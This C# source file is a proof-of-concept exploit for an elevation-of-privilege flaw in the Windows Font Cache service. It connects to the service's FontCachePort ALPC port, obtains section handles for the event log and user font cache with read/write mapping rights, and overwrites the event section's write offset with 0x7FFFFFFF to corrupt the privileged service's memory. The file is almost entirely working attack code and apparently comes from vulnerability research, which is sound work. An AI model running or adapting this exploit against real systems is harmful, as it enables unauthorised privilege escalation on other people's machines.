﻿using NtApiDotNet;
using System;
using System.Runtime.InteropServices;

namespace PoC_WindowsFontCache_SectionAccess_EoP
{
    class Program
    {
        [StructLayout(LayoutKind.Sequential)]
        struct GetEventRequestValue
        {
            public int command;
            public int unk4;
        }

        [StructLayout(LayoutKind.Sequential)]
        struct GetEventResponseValue
        {
            public int unk0;
            public int unk4;
            public int EventSectionHandle;
            public int unkC;
        }

        public enum FontCache
        {
            System = 1,
            FontFace = 2,
            User = 3
        }

        [StructLayout(LayoutKind.Sequential)]
        struct GetCacheRequestValue
        {
            public int command;
            public int unk4;
            public int unk8; // Should be set to 121.
            public FontCache cache_type;
        }

        [StructLayout(LayoutKind.Sequential)]
        struct GetCacheResponseValue
        {
            public int unk0;
            public int unk4;
            public int unk8;
            public int unkC;
            public int unk10;
            public int unk14;
            public int unk18;
            public int unk1C;
        }

        static NtSection GetEventSection(NtAlpcClient client)
        {
            var send_msg = new AlpcMessageType<GetEventRequestValue>(new GetEventRequestValue() { command = 23 });
            var recv_msg = new AlpcMessageType<GetEventResponseValue>();
            client.SendReceive(AlpcMessageFlags.SyncRequest, send_msg, null, recv_msg, null, NtWaitTimeout.Infinite);

            using (var section = NtSection.FromHandle(new IntPtr(recv_msg.Value.EventSectionHandle)))
            {
                return section.Duplicate(SectionAccessRights.MapRead | SectionAccessRights.MapWrite);
            }
        }

        static NtSection GetCacheSection(NtAlpcClient client, FontCache cache_type)
        {
            var send_msg = new AlpcMessageType<GetCacheRequestValue>(new GetCacheRequestValue() { command = 8, unk8 = 121, cache_type = cache_type });
            var recv_msg = new AlpcMessageType<GetCacheResponseValue>();
            client.SendReceive(AlpcMessageFlags.SyncRequest, send_msg, null, recv_msg, null, NtWaitTimeout.Infinite);

            using (var section = NtSection.FromHandle(new IntPtr(recv_msg.Value.unk8)))
            {
                return section.Duplicate(SectionAccessRights.MapRead | SectionAccessRights.MapWrite);
            }
        }

        static void CorruptEventLog(NtAlpcClient client)
        {
            using (var list = new DisposableList())
            {
                var events = list.AddResource(GetEventSection(client));
                Console.WriteLine("{0},{1}", NtProcess.Current.ProcessId, events.Handle.DangerousGetHandle().ToInt32());
                using (var map = events.MapReadWrite())
                {
                    Console.WriteLine("Offset: {0:X}", Marshal.ReadInt32(map.DangerousGetHandle(), 16));
                    // Corrupt the next write offset to be 0x7FFFFFFF.
                    Marshal.WriteInt32(map.DangerousGetHandle(), 16, int.MaxValue);
                    var usercache = list.AddResource(GetCacheSection(client, FontCache.User));
                    Console.WriteLine("Offset: {0:X}", Marshal.ReadInt32(map.DangerousGetHandle(), 16));
                }
                Console.ReadLine();
            }
        }

        static void Main(string[] args)
        {
            try
            {
                AlpcPortAttributes attrs = AlpcPortAttributes.CreateDefault();
                attrs.Flags = AlpcPortAttributeFlags.AllowImpersonation | AlpcPortAttributeFlags.AllowLpcRequests | AlpcPortAttributeFlags.AllowDupObject;

                using (var client = NtAlpcClient.Connect(@"\BaseNamedObjects\FontCachePort", attrs))
                {
                    CorruptEventLog(client);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
